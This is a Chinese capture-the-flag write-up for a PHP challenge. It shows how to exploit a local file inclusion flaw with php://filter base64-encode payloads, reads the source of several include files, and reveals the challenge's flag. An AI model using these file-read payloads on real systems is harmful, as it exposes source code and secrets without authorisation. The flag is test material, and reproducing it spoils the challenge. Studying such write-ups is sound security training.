Include_NBAplayer

信息收集

查看源码

这里可能存在文件包含

测试

随便选一个

伪协议，查看当前页面
php://filter/read=convert.base64-encode/resource=include/file1.php
得到源码

<?php
$html.=<<<A
<img class=player src="include/kobe.png" />
<p class=nabname>
Kobe Bryant is one of the NBA's best scorer, breakthrough, shooting, free throws, three-pointers he chameleonic, almost no offensive blind area, single-game 81 points of personal record is powerful to prove it.In addition to crazy to points, Bryant's organizational ability is also very outstanding, often served as the first sponsors on offense.Bryant is the best form of defence in the league, one of personal defense is very oppressive.
He is a great NAB player!
</p>
A;
?>

可以看到它将一张图片和一段话赋值给了 $html并输出（index.php中有写，伪协议也可以读取）
我们发现图片一共有 5 张，对应五个文件，我们试试读取第六个文件（可能存在）
php://filter/read=convert.base64-encode/resource=include/file6.php
得到

<?php
$html.=<<<A
<p class=nabname>
哦,盲生,你发现了华点!<br />
OKay,flag is in flag.php.<br />
</p>
A;
?>

php://filter/read=convert.base64-encode/resource=include/flag.php

<?php
$a="flag{H4v3_fvn_1NcIudE!}";
$html.=<<<A
<p>
没错,flag就在这里,但是你为什么看不见呢?
伤脑筋,怎么才能看到flag呢?
</p>
A;
'';
?>